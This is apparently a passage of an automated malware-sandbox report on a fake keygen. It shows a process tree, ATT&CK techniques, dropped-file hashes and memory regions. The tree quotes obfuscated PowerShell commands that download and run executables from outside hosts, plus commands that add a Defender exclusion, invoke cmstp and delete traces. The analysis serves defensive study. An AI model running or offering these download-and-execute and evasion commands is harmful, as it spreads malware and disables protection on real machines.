                          PID:480
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                      8⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:1004
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /pid 1004 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\447224480830517\\* & exit
                        9⤵
                          PID:2612
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /pid 1004
                            10⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1892
                  • C:\Users\Public\ypt.exe
                    "C:\Users\Public\ypt.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:2664
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7C70.tmp\b1.hta"
              3⤵
              • Modifies Internet Explorer settings
              • Suspicious use of WriteProcessMemory
              PID:1740
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:892
            • C:\Windows\SysWOW64\timeout.exe
              timeout 2
              3⤵
              • Delays execution with timeout.exe
              PID:1644
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7C70.tmp\ba.hta"
              3⤵
              • Modifies Internet Explorer settings
              • Suspicious use of WriteProcessMemory
              PID:524
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1368
                • C:\Users\Public\ymq.exe
                  "C:\Users\Public\ymq.exe"
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2492
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2584
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                      7⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:2772
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /pid 2772 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\320128177870011\\* & exit
                        8⤵
                          PID:2988
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /pid 2772
                            9⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3044
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:2624
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:2820
                    • C:\Users\Public\ymq.exe
                      "C:\Users\Public\ymq.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops desktop.ini file(s)
                      • Modifies system certificate store
                      PID:2684
                      • C:\Users\Admin\AppData\Local\Temp\1d5vQp32kd.exe
                        "C:\Users\Admin\AppData\Local\Temp\1d5vQp32kd.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1668
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                          "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\1d5vQp32kd.exe"'
                          8⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2348
                      • C:\Users\Admin\AppData\Local\Temp\FZWDK5Dmnj.exe
                        "C:\Users\Admin\AppData\Local\Temp\FZWDK5Dmnj.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:1748
                        • C:\Windows\SysWOW64\Notepad.exe
                          "C:\Windows\System32\Notepad.exe"
                          8⤵
                            PID:2648
                        • C:\Users\Admin\AppData\Local\Temp\9RGkZj9Fuj.exe
                          "C:\Users\Admin\AppData\Local\Temp\9RGkZj9Fuj.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of SetWindowsHookEx
                          PID:2516
                          • \??\c:\windows\SysWOW64\cmstp.exe
                            "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\ix23fka1.inf
                            8⤵
                              PID:2848
                          • C:\Users\Admin\AppData\Local\Temp\cxVqmYf8XT.exe
                            "C:\Users\Admin\AppData\Local\Temp\cxVqmYf8XT.exe"
                            7⤵
                            • Executes dropped EXE
                            • Windows security modification
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2452
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "powershell" Get-MpPreference -verbose
                              8⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1568
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\ymq.exe"
                            7⤵
                              PID:2640
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /T 10 /NOBREAK
                                8⤵
                                • Delays execution with timeout.exe
                                PID:1380
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7C70.tmp\ba1.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of WriteProcessMemory
                      PID:1124
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:832

                Network

                MITRE ATT&CK Matrix ATT&CK v6

                Persistence

                Modify Existing Service

                1
                T1031

                Defense Evasion

                Modify Registry

                4
                T1112

                Disabling Security Tools

                2
                T1089

                Install Root Certificate

                1
                T1130

                Credential Access

                Credentials in Files

                3
                T1081

                Discovery

                Query Registry

                2
                T1012

                System Information Discovery

                2
                T1082

                Collection

                Data from Local System

                3
                T1005

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\ProgramData\MSVCP140.dll
                • C:\ProgramData\VCRUNTIME140.dll
                • C:\ProgramData\freebl3.dll
                • C:\ProgramData\mozglue.dll
                • C:\ProgramData\mozglue.dll
                • C:\ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • C:\ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • C:\ProgramData\softokn3.dll
                • C:\ProgramData\softokn3.dll
                • C:\ProgramData\sqlite3.dll
                • C:\ProgramData\sqlite3.dll
                • C:\ProgramData\vcruntime140.dll
                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_25b0acf8-aabf-4ff0-a018-a53de35941e0
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_646733da-d62a-47f5-8154-d8076e5ffebb
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7c604c6f-9095-4bcb-ad30-efa57059f78e
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc5833ae-3abd-4607-810f-e774cc5ed6d3
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fdc4d035-50d5-4306-a976-4cf6c24b22cb
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Temp\1d5vQp32kd.exe
                • C:\Users\Admin\AppData\Local\Temp\1d5vQp32kd.exe
                • C:\Users\Admin\AppData\Local\Temp\7C70.tmp\Keygen.exe
                • C:\Users\Admin\AppData\Local\Temp\7C70.tmp\Keygen.exe
                • C:\Users\Admin\AppData\Local\Temp\7C70.tmp\b.hta
                • C:\Users\Admin\AppData\Local\Temp\7C70.tmp\b1.hta
                • C:\Users\Admin\AppData\Local\Temp\7C70.tmp\ba.hta
                • C:\Users\Admin\AppData\Local\Temp\7C70.tmp\ba1.hta
                • C:\Users\Admin\AppData\Local\Temp\7C70.tmp\m.hta
                • C:\Users\Admin\AppData\Local\Temp\7C70.tmp\m1.hta
                • C:\Users\Admin\AppData\Local\Temp\7C70.tmp\start.bat
                • C:\Users\Admin\AppData\Local\Temp\9RGkZj9Fuj.exe
                • C:\Users\Admin\AppData\Local\Temp\9RGkZj9Fuj.exe
                • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FZWDK5Dmnj.exe
                  MD5

                  013db621a3351e3fb049efd2ccad79ff

                  SHA1

                  a23394ea54dbc5342a77938a2c285ee616185560

                  SHA256

                  df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                  SHA512

                  1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\cxVqmYf8XT.exe
                • C:\Users\Admin\AppData\Local\Temp\cxVqmYf8XT.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Public\mnq.exe
                • C:\Users\Public\mnq.exe
                • C:\Users\Public\ymq.exe
                • C:\Users\Public\ymq.exe
                • C:\Users\Public\ymq.exe
                • C:\Users\Public\ypt.exe
                • C:\Users\Public\ypt.exe
                • C:\Users\Public\ypt.exe
                • C:\Windows\temp\ix23fka1.inf
                • \??\PIPE\srvsvc
                • \??\PIPE\srvsvc
                • \??\PIPE\srvsvc
                • \ProgramData\mozglue.dll
                • \ProgramData\mozglue.dll
                • \ProgramData\mozglue.dll
                • \ProgramData\msvcp140.dll
                • \ProgramData\msvcp140.dll
                • \ProgramData\msvcp140.dll
                • \ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \ProgramData\sqlite3.dll
                • \ProgramData\sqlite3.dll
                • \ProgramData\sqlite3.dll
                • \ProgramData\vcruntime140.dll
                • \ProgramData\vcruntime140.dll
                • \ProgramData\vcruntime140.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                  MD5

                  02cc7b8ee30056d5912de54f1bdfc219

                  SHA1

                  a6923da95705fb81e368ae48f93d28522ef552fb

                  SHA256

                  1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                  SHA512

                  0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                • \Users\Admin\AppData\LocalLow\sqlite3.dll
                • \Users\Admin\AppData\Local\Temp\1d5vQp32kd.exe
                • \Users\Admin\AppData\Local\Temp\7C70.tmp\Keygen.exe
                • \Users\Admin\AppData\Local\Temp\9RGkZj9Fuj.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FZWDK5Dmnj.exe
                  MD5

                  013db621a3351e3fb049efd2ccad79ff

                  SHA1

                  a23394ea54dbc5342a77938a2c285ee616185560

                  SHA256

                  df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                  SHA512

                  1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • \Users\Admin\AppData\Local\Temp\cxVqmYf8XT.exe
                • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • \Users\Public\mnq.exe
                • \Users\Public\mnq.exe
                • \Users\Public\ymq.exe
                • \Users\Public\ymq.exe
                • \Users\Public\ypt.exe
                • memory/480-302-0x0000000000400000-0x0000000000420000-memory.dmp
                  Filesize

                  128KB

                • memory/480-299-0x0000000000400000-0x0000000000420000-memory.dmp
                  Filesize

                  128KB

                • memory/480-300-0x000000000041A684-mapping.dmp
                • memory/524-18-0x0000000000000000-mapping.dmp
                • memory/628-162-0x0000000006490000-0x0000000006491000-memory.dmp
                  Filesize

                  4KB

                • memory/628-33-0x00000000709A0000-0x000000007108E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/628-203-0x00000000066E0000-0x00000000066E1000-memory.dmp
                  Filesize

                  4KB

                • memory/628-52-0x0000000005340000-0x0000000005341000-memory.dmp
                  Filesize

                  4KB

                • memory/628-168-0x0000000006570000-0x0000000006571000-memory.dmp
                  Filesize

                  4KB

                • memory/628-204-0x00000000066F0000-0x00000000066F1000-memory.dmp
                  Filesize

                  4KB

                • memory/628-21-0x0000000000000000-mapping.dmp
                • memory/832-26-0x0000000000000000-mapping.dmp
                • memory/832-46-0x0000000002700000-0x0000000002701000-memory.dmp
                  Filesize

                  4KB

                • memory/832-40-0x0000000004BD0000-0x0000000004BD1000-memory.dmp
                  Filesize

                  4KB

                • memory/832-31-0x00000000709A0000-0x000000007108E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/844-24-0x0000000000000000-mapping.dmp
                • memory/844-30-0x00000000709A0000-0x000000007108E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/892-217-0x0000000006490000-0x0000000006491000-memory.dmp
                  Filesize

                  4KB

                • memory/892-22-0x0000000000000000-mapping.dmp
                • memory/892-32-0x00000000709A0000-0x000000007108E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/892-216-0x0000000006440000-0x0000000006441000-memory.dmp
                  Filesize

                  4KB

                • memory/1004-272-0x0000000000400000-0x0000000000434000-memory.dmp
                  Filesize

                  208KB

                • memory/1004-275-0x0000000000400000-0x0000000000434000-memory.dmp
                  Filesize

                  208KB

                • memory/1004-273-0x0000000000417A8B-mapping.dmp
                • memory/1044-0-0x0000000000000000-mapping.dmp
                • memory/1124-20-0x0000000000000000-mapping.dmp
                • memory/1152-23-0x0000000000000000-mapping.dmp
                • memory/1152-28-0x00000000709A0000-0x000000007108E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/1152-104-0x00000000064D0000-0x00000000064D1000-memory.dmp
                  Filesize

                  4KB

                • memory/1368-66-0x00000000062E0000-0x00000000062E1000-memory.dmp
                  Filesize

                  4KB

                • memory/1368-65-0x0000000006220000-0x0000000006221000-memory.dmp
                  Filesize

                  4KB

                • memory/1368-60-0x00000000061E0000-0x00000000061E1000-memory.dmp
                  Filesize

                  4KB

                • memory/1368-25-0x0000000000000000-mapping.dmp
